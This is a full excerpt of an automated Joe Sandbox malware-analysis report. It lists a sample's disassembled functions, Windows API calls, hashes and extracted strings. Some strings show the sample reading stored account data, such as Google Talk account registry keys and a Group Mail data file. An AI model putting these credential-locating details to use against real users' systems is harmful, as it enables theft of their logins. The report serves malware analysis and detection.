                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 365 4034e4-403544 memset * 2 call 410b1e 368 403580-403582 365->368 369 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 365->369 369->368
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00403504
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040351A
                                                                                                                                                                                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                              • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                                                                                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                                                              • _mbscat.MSVCRT ref: 0040356D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                                                              • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                                                                              • API String ID: 3071782539-966475738
                                                                                                                                                                                                                              • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                                                                                                                                                              • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 374 40ccd7-40cd06 ??2@YAPAXI@Z 375 40cd08-40cd0d 374->375 376 40cd0f 374->376 377 40cd11-40cd24 ??2@YAPAXI@Z 375->377 376->377 378 40cd26-40cd2d call 404025 377->378 379 40cd2f 377->379 381 40cd31-40cd57 378->381 379->381 383 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 381->383 384 40cd59-40cd60 DeleteObject 381->384 384->383
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2054149589-0
                                                                                                                                                                                                                              • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                                                                                                                                                              • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                                                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                                                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                                                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                                                                                                                                • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                                                                • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00408620
                                                                                                                                                                                                                                • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00408671
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                                                                                                                              • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                                                              • API String ID: 1366857005-1079885057
                                                                                                                                                                                                                              • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                                                                                                                                                              • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 414 40ba28-40ba3a 415 40ba87-40ba9b call 406c62 414->415 416 40ba3c-40ba52 call 407e20 _mbsicmp 414->416 438 40ba9d call 4107f1 415->438 439 40ba9d call 404734 415->439 440 40ba9d call 404785 415->440 441 40ba9d call 403c16 415->441 442 40ba9d call 410a9c 415->442 421 40ba54-40ba6d call 407e20 416->421 422 40ba7b-40ba85 416->422 428 40ba74 421->428 429 40ba6f-40ba72 421->429 422->415 422->416 423 40baa0-40bab3 call 407e30 430 40bab5-40bac1 423->430 431 40bafa-40bb09 SetCursor 423->431 432 40ba75-40ba76 call 40b5e5 428->432 429->432 433 40bac3-40bace 430->433 434 40bad8-40baf7 qsort 430->434 432->422 433->434 434->431 438->423 439->423 440->423 441->423 442->423
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                                                                              • String ID: /nosort$/sort
                                                                                                                                                                                                                              • API String ID: 882979914-1578091866
                                                                                                                                                                                                                              • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                                                                                                                              • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                                                                                                                                                                • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00410E10
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                                                              • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                                                                • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                              • API String ID: 889583718-2036018995
                                                                                                                                                                                                                              • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                                                                                                                                                              • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3473537107-0
                                                                                                                                                                                                                              • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                                                              • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004109F7
                                                                                                                                                                                                                                • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                                                                                                                                • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                                                                                                                              • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00410A32
                                                                                                                                                                                                                              • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3143880245-0
                                                                                                                                                                                                                              • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                                                                                                                              • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ??3@
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 613200358-0
                                                                                                                                                                                                                              • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                                                                                                                              • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00403F8E,0044C530), ref: 00408D5C
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00403F8E,0044C530), ref: 00408D7A
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00403F8E,0044C530), ref: 00408D98
                                                                                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00403F8E,0044C530), ref: 00408DA8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ??2@
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1033339047-0
                                                                                                                                                                                                                              • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                                                              • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                                                                                • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                                                                                                                                                              • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                                              • String ID: Arial
                                                                                                                                                                                                                              • API String ID: 3853255127-493054409
                                                                                                                                                                                                                              • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                                                                                                                                                                                              • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,00000078,00000004), ref: 0044B43E
                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000078,00000004), ref: 0044B452
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                                                              • Opcode ID: 7b0ab345f8b147095ec499268aed239778a4d345bd8648cab821ed5a180e1bce
                                                                                                                                                                                                                              • Instruction ID: ac13c79d7fe72252008cad2d8c7d399cb1c4cdb5f22be9a76d9ffffc69c753be
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b0ab345f8b147095ec499268aed239778a4d345bd8648cab821ed5a180e1bce
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86F0A4011896907DFA2199B90C42BB75BCCCB27320B240B4BF690C7283D69DCA1693FA
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 145871493-0
                                                                                                                                                                                                                              • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                                                                                                                              • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                                                                                                                                • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                                                                                                                                • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                                                                                                                                • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4165544737-0
                                                                                                                                                                                                                              • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                                                              • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                                                                                              • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                                                              • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                              • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                                                              • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                                                                                              • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                                                              • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnumNamesResource
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3334572018-0
                                                                                                                                                                                                                              • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                                                                                                                              • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Open
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                                                                                                              • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                                                              • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17